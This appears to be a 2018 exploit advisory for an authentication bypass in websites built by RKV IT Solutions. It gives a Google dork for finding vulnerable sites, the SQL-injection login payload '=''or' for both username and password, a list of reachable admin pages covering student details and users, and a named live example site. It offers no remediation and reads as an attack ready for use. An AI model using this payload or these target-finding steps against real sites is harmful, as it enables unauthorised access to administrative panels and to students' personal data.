################################################################################################# # Exploit Title : Developed By RKV IT Solutions Pvt. Ltd India Authentication Bypass Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 23/09/2018 # Vendor Homepage : rkvitsolutions.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-592 - [ Authentication Bypass Issues ] ################################################################################################# # Google Dork : intext:''Developed By : RKV IT Solutions Pvt. Ltd'' # Admin Panel Path => /admin/ # Exploit : Admin Username : '=''or' Admin Password : '=''or' # Useable Admin Control Panel URL Links => /admin/a_Welcome.aspx /admin/manage_news.aspx /admin/Gallery.aspx /admin/stud_Speak.aspx /admin/Inquery_for_Admission.aspx /admin/Send_Student_Details.aspx /admin/Student_Details.aspx /admin/user.aspx Directory File Path : /admin/Gallery.ashx?id=[ID-NUMBER] ################################################################################################# # Example Site => actcomputer.org.in/admin => [ Proof of Concept ] => archive.is/brgcu ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################